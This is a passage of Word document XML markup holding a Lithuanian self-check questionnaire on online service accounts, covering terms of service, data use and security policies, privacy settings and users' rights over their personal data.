          <w:t>http://windows.microsoft.com/en-us/windows/microsoft-services-agreement</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="140BD4E2" w14:textId="3F7D3B41" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="00AB1DA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26DFED2E" w14:textId="084D5A7F" w:rsidR="00AB1DA7" w:rsidRPr="005A5C28" w:rsidRDefault="0066332E"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Papildomi s</w:t>
      </w:r>
      <w:r w:rsidR="00F453A0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>avikontrolės klausimai</w:t>
      </w:r>
      <w:r w:rsidR="71FD4F14" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1191D" w14:textId="76481087"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1.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Ar </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudojatės</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>internetinių paslaugų teikėjų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paskyr</w:t>
      </w:r>
      <w:r w:rsidR="00031287" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>omis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">? Jei taip, ar </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>esate susipažinę su</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paslaugų teikimo sąlyg</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>omis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F5037C" w14:textId="301236DA"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2.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paaiškinkite, kas</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E474A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>uomenų naudojimo politika?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53141013" w14:textId="45CF140C"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3</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra privatumo nustatymai</w:t>
      </w:r>
      <w:r w:rsidR="00831756" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>? I</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>švardinkite, kokie jie būna</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90B671" w14:textId="3440FBCF"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4.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Paaiškinkite, kaip suprantate</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sąvoką</w:t>
      </w:r>
      <w:r w:rsidR="000E474A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>saugumo politika</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5AED8" w14:textId="279593D5"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5.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išvardinkite savo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>teis</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kurios yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>susijusios su jūsų</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> asmeniniais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>duomenimis? Ar</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jūs turite teisę</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>paprašyt</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>informacijos apie</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>savo duomen</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ir</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pareikalauti</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, kad jums būtų pateiktos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jūsų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>duomenų</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> kopijos?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFC863" w14:textId="4785E8E4"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6.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aip</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paslaugų teikėjas gali pa</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sinaudoti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jūsų įkeltais</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> asmeniniais</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>duomenimis?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2FD341" w14:textId="532571FE"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7.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kas nutiks</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> su</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>jūsų duomenims</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, kai</w:t>
      </w:r>
      <w:r w:rsidR="00733CDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> atitinkama</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paskyra bus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>uždar</w:t>
      </w:r>
      <w:r w:rsidR="004D3439" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>yta</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E78F0D" w14:textId="55A85C66"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8.</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
